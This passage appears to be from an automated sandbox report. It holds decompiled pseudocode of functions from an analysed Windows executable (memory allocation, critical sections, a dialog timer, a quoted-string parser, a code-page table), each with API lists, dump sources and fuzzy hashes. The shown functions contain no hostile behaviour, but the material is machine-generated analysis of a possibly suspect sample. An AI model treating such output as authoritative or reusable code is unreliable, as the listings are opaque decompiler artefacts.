                              					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
                              					_t6 = _t43 + 0x18; // 0x18
                              					_t28 = _t6;
                              					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
                              					 *(_t43 + 0x10) = _t42;
                              					 *((intOrPtr*)(_t43 + 8)) = _t28;
                              					_t45 = 0;
                              					do {
                              						_t55 = _t45 - 0x10;
                              						_t45 = _t45 + 1;
                              						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
                              						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
                              						_t28 = _t28 + 8;
                              					} while (_t45 < 0x400);
                              					E00417DA0(_t42, 0, 0x10000);
                              					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
                              						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
                              						_t16 = _t42 + 8; // -4088
                              						 *_t42 = _t16;
                              						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
                              						_t42 = _t42 + 0x1000;
                              					}
                              					return _t43;
                              				}
                              			}










                              APIs
                              • HeapAlloc.KERNEL32(00000000,00002020,00420818,00420818,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165BD
                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165E1
                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165FB
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?), ref: 004166BC
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?,00000000), ref: 004166D3
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: AllocVirtual$FreeHeap
                              • String ID:
                              • API String ID: 714016831-0
                              • Opcode ID: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                              • Instruction ID: 0af9858cac0a30669fb94f5f64461d90f8de944a7195c69e4f59e8ed45fdce2d
                              • Opcode Fuzzy Hash: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                              • Instruction Fuzzy Hash: 983101B0700705EBD3309F24EC45BA2BBE4EB44794F12823AE55597791E778E8818BCC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00409787(void* __ecx, void* __edx) {
                              				signed int _t48;
                              				intOrPtr* _t54;
                              				signed int _t60;
                              				intOrPtr _t61;
                              				void* _t76;
                              				struct _CRITICAL_SECTION* _t80;
                              				signed int _t81;
                              				void* _t84;
                              				void* _t86;
                              
                              				_t76 = __edx;
                              				E00413954(E00419CC0, _t86);
                              				_t84 = __ecx;
                              				_t80 = __ecx + 0x40;
                              				if(E004095DD(_t80) == 0) {
                              					E0040998D(__ecx);
                              					EnterCriticalSection(_t80);
                              					_t60 =  *(_t80 + 0x20);
                              					 *(_t86 - 0x10) =  *(_t80 + 0x24);
                              					 *((intOrPtr*)(_t86 - 0x20)) =  *((intOrPtr*)(_t80 + 0x28));
                              					 *((intOrPtr*)(_t86 - 0x1c)) =  *((intOrPtr*)(_t80 + 0x2c));
                              					LeaveCriticalSection(_t80);
                              					if(_t60 !=  *((intOrPtr*)(_t84 + 0x28)) ||  *(_t86 - 0x10) !=  *((intOrPtr*)(_t84 + 0x2c))) {
                              						E0040969B(_t84, _t60,  *(_t86 - 0x10));
                              					}
                              					E0040970E(_t84,  *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)));
                              					_t81 = 0;
                              					if((_t60 |  *(_t86 - 0x10)) == 0) {
                              						 *(_t86 - 0x10) = _t81;
                              						_t60 = 1;
                              					}
                              					_t61 = E00413D80(E00414490( *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)), 0x64, _t81), _t76, _t60,  *(_t86 - 0x10));
                              					if(_t61 !=  *((intOrPtr*)(_t84 + 0x34))) {
                              						asm("cdq");
                              						E00403A0B(_t86 - 0xa4, _t76, _t47, _t76);
                              						E00401C80(_t86 - 0x18, _t86 - 0xa4);
                              						 *(_t86 - 4) = _t81;
                              						E00407D25(_t86 - 0x18, _t76, L"% ");
                              						_push(_t84 + 0xc);
                              						_t54 = E00402634(_t86 - 0x24, _t86 - 0x18);
                              						 *(_t86 - 4) = 1;
                              						E00406049( *((intOrPtr*)(_t84 + 4)),  *_t54);
                              						E00403A9C( *((intOrPtr*)(_t86 - 0x24)));
                              						 *((intOrPtr*)(_t84 + 0x34)) = _t61;
                              						E00403A9C( *((intOrPtr*)(_t86 - 0x18)));
                              					}
                              					_t48 = 1;
                              				} else {
                              					_t48 = 1;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0xc));
                              				return _t48;
                              			}













                              APIs
                              • __EH_prolog.LIBCMT ref: 0040978C
                                • Part of subcall function 004095DD: EnterCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095E2
                                • Part of subcall function 004095DD: LeaveCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095EC
                              • EnterCriticalSection.KERNEL32(?), ref: 004097B9
                              • LeaveCriticalSection.KERNEL32(?), ref: 004097D5
                              • __aulldiv.LIBCMT ref: 00409824
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave$H_prolog__aulldiv
                              • String ID:
                              • API String ID: 3848147900-0
                              • Opcode ID: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                              • Instruction ID: 0a470d0c852558693c62499fef9fcf54cb9603282822d0262474d13d459b1607
                              • Opcode Fuzzy Hash: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                              • Instruction Fuzzy Hash: D2316076A00219AFCB10EFA1C881AEFBBB5FF48314F00442EE10573692CB79AD45CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004095F7(void* __ecx) {
                              				void* _t32;
                              
                              				_t32 = __ecx;
                              				 *(__ecx + 0x28) =  *(__ecx + 0x28) | 0xffffffff;
                              				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
                              				 *(__ecx + 0x34) =  *(__ecx + 0x34) | 0xffffffff;
                              				 *((char*)(__ecx + 0x38)) = 1;
                              				E00413260(__ecx + 0x3c);
                              				 *((intOrPtr*)(_t32 + 0x30)) = GetDlgItem( *(__ecx + 4), 0x3e8);
                              				if( *(_t32 + 0x70) >= 0) {
                              					SendMessageA( *(_t32 + 4), 0x80, 1, LoadIconA( *0x423144,  *(_t32 + 0x70) & 0x0000ffff));
                              				}
                              				 *((intOrPtr*)(_t32 + 8)) = SetTimer( *(_t32 + 4), 3, 0x64, 0);
                              				E00406049( *(_t32 + 4),  *((intOrPtr*)(_t32 + 0xc)));
                              				E0040998D(_t32);
                              				return 1;
                              			}





                              APIs
                                • Part of subcall function 00413260: SetEvent.KERNEL32(00000000,00407649), ref: 00413263
                              • GetDlgItem.USER32 ref: 0040961A
                              • LoadIconA.USER32 ref: 00409634
                              • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00409645
                              • SetTimer.USER32 ref: 00409654
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: EventIconItemLoadMessageSendTimer
                              • String ID:
                              • API String ID: 2758541657-0
                              • Opcode ID: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                              • Instruction ID: 551790b6ae67963d7c94afa5d69916b6b09ae611f895d6b9f891aac7cfc7161a
                              • Opcode Fuzzy Hash: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                              • Instruction Fuzzy Hash: AF010830140B00AFD7219B21DD5AB66BBA1BF04721F008B2DE9A7959E0CB76B951CB48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040D7CC(void* __ecx) {
                              				signed int _t118;
                              				signed int _t129;
                              				signed int* _t130;
                              				signed int _t150;
                              				signed int _t151;
                              				signed int _t160;
                              				intOrPtr _t162;
                              				signed int* _t180;
                              				signed int _t181;
                              				signed int _t190;
                              				signed int _t191;
                              				signed int _t192;
                              				signed int _t195;
                              				signed int _t196;
                              				intOrPtr _t198;
                              				void* _t200;
                              				signed int* _t202;
                              				void* _t203;
                              
                              				E00413954(E0041A61C, _t203);
                              				_t200 = __ecx;
                              				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
                              					L31:
                              					_t118 = 0;
                              				} else {
                              					E004032A8(_t203 - 0x28, 1);
                              					 *((intOrPtr*)(_t203 - 0x28)) = 0x41b748;
                              					_t150 = 0;
                              					 *(_t203 - 4) = 0;
                              					E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
                              					_t190 = 0;
                              					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
                              						L5:
                              						_t191 = 0;
                              						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
                              							L8:
                              							E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
                              							_t192 = 0;
                              							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
                              								L11:
                              								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
                              								E004042AD(_t203 - 0x28);
                              								_t160 = 0x20;
                              								memset(_t203 - 0xd0, 0, _t160 << 2);
                              								_t162 = 4;
                              								 *(_t203 - 0x38) = _t150;
                              								 *(_t203 - 0x34) = _t150;
                              								 *(_t203 - 0x30) = _t150;
                              								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
                              								 *((intOrPtr*)(_t203 - 0x3c)) = 0x41b378;
                              								 *(_t203 - 4) = 1;
                              								 *(_t203 - 0x4c) = _t150;
                              								 *(_t203 - 0x48) = _t150;
                              								 *(_t203 - 0x44) = _t150;
                              								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
                              								 *((intOrPtr*)(_t203 - 0x50)) = 0x41b378;
                              								 *(_t203 - 4) = 2;
                              								 *(_t203 - 0x10) = _t150;
                              								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
                              									do {
                              										 *(_t203 - 0x14) = _t150;
                              										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
                              										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
                              											do {
                              												E004039DF(_t203 - 0x3c,  *(_t203 - 0x10));
                              												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
                              											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
                              										}
                              										 *(_t203 - 0x14) = _t150;
                              										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
                              											do {
                              												E004039DF(_t203 - 0x50,  *(_t203 - 0x10));
                              												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
                              											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
                              										}
                              										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
                              									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
                              								}
                              								_t195 = 0;
                              								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
                              									do {
                              										_t151 = 1;
                              										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
                              										_t195 = _t195 + 1;
                              									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
                              									_t150 = 0;
                              								}
                              								 *(_t203 - 4) = 1;
                              								E004042AD(_t203 - 0x50);
                              								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
                              								E004042AD(_t203 - 0x3c);
                              								_t180 = _t203 - 0xd0;
                              								 *(_t203 - 0x14) = 0x20;
                              								do {
                              									 *(_t203 - 0x10) = _t150;
                              									_t202 = _t203 - 0xd0;
                              									do {
                              										_t129 =  *_t180;
                              										_t196 = 1;
                              										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
                              											 *_t180 = _t129 |  *_t202;
                              										}
                              										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
                              										_t202 =  &(_t202[1]);
                              									} while ( *(_t203 - 0x10) < 0x20);
                              									_t180 =  &(_t180[1]);
                              									_t106 = _t203 - 0x14;
                              									 *_t106 =  *(_t203 - 0x14) - 1;
                              								} while ( *_t106 != 0);
                              								_t130 = _t203 - 0xd0;
                              								while(1) {
                              									_t181 = 1;
                              									if(( *_t130 & _t181 << _t150) != 0) {
                              										goto L31;
                              									}
                              									_t150 = _t150 + 1;
                              									_t130 =  &(_t130[1]);
                              									if(_t150 < 0x20) {
                              										continue;
                              									} else {
                              										_t118 = 1;
                              									}
                              									goto L32;
                              								}
                              								goto L31;
                              							} else {
                              								while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
                              									_t192 = _t192 + 1;
                              									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
                              										continue;
                              									} else {
                              										goto L11;
                              									}
                              									goto L32;
                              								}
                              								goto L30;
                              							}
                              						} else {
                              							while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
                              								_t191 = _t191 + 1;
                              								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
                              									continue;
                              								} else {
                              									goto L8;
                              								}
                              								goto L32;
                              							}
                              							goto L30;
                              						}
                              					} else {
                              						while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
                              							_t190 = _t190 + 1;
                              							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
                              								continue;
                              							} else {
                              								goto L5;
                              							}
                              							goto L32;
                              						}
                              						L30:
                              						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
                              						E004042AD(_t203 - 0x28);
                              						goto L31;
                              					}
                              				}
                              				L32:
                              				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
                              				return _t118;
                              			}






















                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $
                              • API String ID: 3519838083-227171996
                              • Opcode ID: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                              • Instruction ID: b608afa5533618173c50a936dd0dc92eebd328cd23ff399218f1dfb4b0bc6294
                              • Opcode Fuzzy Hash: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                              • Instruction Fuzzy Hash: 6A713571E0020A9FCB24DF99D481AAEB7B1FF48314F10457ED416B7691D734AA8ACF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E00403D5A(intOrPtr* __ecx, intOrPtr __edx) {
                              				void* __edi;
                              				void* _t69;
                              				signed int _t70;
                              				intOrPtr _t79;
                              				intOrPtr _t90;
                              				signed int _t91;
                              				char _t98;
                              				char _t116;
                              				intOrPtr* _t136;
                              				void* _t138;
                              
                              				E00413954(E004194DC, _t138);
                              				_t136 = __ecx;
                              				 *((intOrPtr*)(_t138 - 0x20)) = __edx;
                              				E004042D6();
                              				 *((intOrPtr*)(_t138 - 0x10)) = 0;
                              				while(1) {
                              					L1:
                              					_t69 = E00403FE2(_t136, _t138 - 0x10);
                              					_t146 = _t69;
                              					if(_t69 == 0) {
                              						break;
                              					}
                              					E00402EE1(_t138 - 0x50);
                              					 *(_t138 - 4) = 0;
                              					E00402EE1(_t138 - 0x44);
                              					_t7 = _t138 - 0x14; // 0x414be4
                              					 *(_t138 - 4) = 1;
                              					E00403F3C(_t138 - 0x38,  *_t136 +  *((intOrPtr*)(_t138 - 0x10)));
                              					 *(_t138 - 4) = 2;
                              					if(E0040411F(_t138 - 0x38, _t138 - 0x50, _t146) == 0) {
                              						L26:
                              						E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
                              						E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
                              						E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
                              						L28:
                              						_t70 = 0;
                              						__eflags = 0;
                              						L29:
                              						 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
                              						return _t70;
                              					}
                              					_t15 = _t138 - 0x14; // 0x414be4
                              					_t79 =  *_t15;
                              					if(_t79 == 0) {
                              						goto L26;
                              					}
                              					 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + _t79;
                              					if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x3d) {
                              						goto L26;
                              					} else {
                              						 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                              						if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x22) {
                              							goto L26;
                              						} else {
                              							 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                              							 *((intOrPtr*)(_t138 - 0x2c)) = 0;
                              							 *((intOrPtr*)(_t138 - 0x28)) = 0;
                              							 *((intOrPtr*)(_t138 - 0x24)) = 0;
                              							E0040243E(_t138 - 0x2c, 3);
                              							 *(_t138 - 4) = 3;
                              							while( *((intOrPtr*)(_t138 - 0x10)) <  *((intOrPtr*)(_t136 + 4))) {
                              								_t90 =  *_t136;
                              								_t116 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
                              								 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                              								 *((char*)(_t138 - 0x1c)) = _t116;
                              								if(_t116 == 0x22) {
                              									_t91 = E0040411F(_t138 - 0x2c, _t138 - 0x44, __eflags);
                              									__eflags = _t91;
                              									if(_t91 == 0) {
                              										break;
                              									}
                              									_push(_t138 - 0x50);
                              									E004040BE( *((intOrPtr*)(_t138 - 0x20)), 0);
                              									E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
                              									E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
                              									 *(_t138 - 4) =  *(_t138 - 4) | 0xffffffff;
                              									E0040213F(_t138 - 0x50);
                              									goto L1;
                              								}
                              								if(_t116 != 0x5c) {
                              									_push( *((intOrPtr*)(_t138 - 0x1c)));
                              								} else {
                              									_t98 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
                              									 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                              									 *((char*)(_t138 - 0x18)) = _t98;
                              									if(_t98 == 0x22) {
                              										_push(0x22);
                              									} else {
                              										if(_t98 == 0x5c) {
                              											_push(0x5c);
                              										} else {
                              											if(_t98 == 0x6e) {
                              												_push(0xa);
                              											} else {
                              												if(_t98 == 0x74) {
                              													_push(9);
                              												} else {
                              													E00401EE5(_t138 - 0x2c, 0x5c);
                              													_push( *((intOrPtr*)(_t138 - 0x18)));
                              												}
                              											}
                              										}
                              									}
                              								}
                              								E00401EE5(_t138 - 0x2c);
                              							}
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
                              							goto L28;
                              						}
                              					}
                              				}
                              				_t70 = 1;
                              				goto L29;
                              			}














                              APIs
                              • __EH_prolog.LIBCMT ref: 00403D5F
                                • Part of subcall function 00403F3C: __EH_prolog.LIBCMT ref: 00403F41
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: > @$KA
                              • API String ID: 3519838083-301980584
                              • Opcode ID: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                              • Instruction ID: 0797aa4f2666763f951e0621ef07ec53320c6840b80f95fc9e8c0876c74f2843
                              • Opcode Fuzzy Hash: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                              • Instruction Fuzzy Hash: 27517D30D0020A9ACF15EF95C855AEEBF7AAF5430AF10452FE452372D2DB795B06CB89
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E0041808D(void* __ebx, void* __edi) {
                              				char _v17;
                              				signed char _v18;
                              				struct _cpinfo _v24;
                              				char _v280;
                              				char _v536;
                              				char _v792;
                              				char _v1304;
                              				void* _t43;
                              				char _t44;
                              				signed char _t45;
                              				void* _t55;
                              				signed int _t56;
                              				signed char _t64;
                              				intOrPtr* _t66;
                              				signed int _t68;
                              				signed int _t70;
                              				signed int _t71;
                              				signed char _t76;
                              				signed char _t77;
                              				signed char* _t78;
                              				void* _t81;
                              				void* _t87;
                              				void* _t88;
                              
                              				if(GetCPInfo( *0x4256c8,  &_v24) == 1) {
                              					_t44 = 0;
                              					do {
                              						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
                              						_t44 = _t44 + 1;
                              					} while (_t44 < 0x100);
                              					_t45 = _v18;
                              					_v280 = 0x20;
                              					if(_t45 == 0) {
                              						L9:
                              						E00418A6C(1,  &_v280, 0x100,  &_v1304,  *0x4256c8,  *0x4258e4, 0);
                              						E0041881D( *0x4258e4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4256c8, 0);
                              						E0041881D( *0x4258e4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4256c8, 0);
                              						_t55 = 0;
                              						_t66 =  &_v1304;
                              						do {
                              							_t76 =  *_t66;
                              							if((_t76 & 0x00000001) == 0) {
                              								if((_t76 & 0x00000002) == 0) {
                              									 *(_t55 + 0x4256e0) =  *(_t55 + 0x4256e0) & 0x00000000;
                              									goto L16;
                              								}
                              								 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000020;
                              								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
                              								L12:
                              								 *(_t55 + 0x4256e0) = _t77;
                              								goto L16;
                              							}
                              							 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000010;
                              							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
                              							goto L12;
                              							L16:
                              							_t55 = _t55 + 1;
                              							_t66 = _t66 + 2;
                              						} while (_t55 < 0x100);
                              						return _t55;
                              					}
                              					_t78 =  &_v17;
                              					do {
                              						_t68 =  *_t78 & 0x000000ff;
                              						_t56 = _t45 & 0x000000ff;
                              						if(_t56 <= _t68) {
                              							_t81 = _t87 + _t56 - 0x114;
                              							_t70 = _t68 - _t56 + 1;
                              							_t71 = _t70 >> 2;
                              							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
                              							_t88 = _t88 + 0x18;
                              						}
                              						_t78 =  &(_t78[2]);
                              						_t45 =  *((intOrPtr*)(_t78 - 1));
                              					} while (_t45 != 0);
                              					goto L9;
                              				}
                              				_t43 = 0;
                              				do {
                              					if(_t43 < 0x41 || _t43 > 0x5a) {
                              						if(_t43 < 0x61 || _t43 > 0x7a) {
                              							 *(_t43 + 0x4256e0) =  *(_t43 + 0x4256e0) & 0x00000000;
                              						} else {
                              							 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000020;
                              							_t64 = _t43 - 0x20;
                              							goto L22;
                              						}
                              					} else {
                              						 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000010;
                              						_t64 = _t43 + 0x20;
                              						L22:
                              						 *(_t43 + 0x4256e0) = _t64;
                              					}
                              					_t43 = _t43 + 1;
                              				} while (_t43 < 0x100);
                              				return _t43;
                              			}



























                              APIs
                              • GetCPInfo.KERNEL32(?,00000000), ref: 004180A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Info
                              • String ID: $
                              • API String ID: 1807457897-3032137957
                              • Opcode ID: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                              • Instruction ID: d0f9309d8466ab513fef0fe96190925d4c3a9a36aebfd3e00fd14af349a29a6b
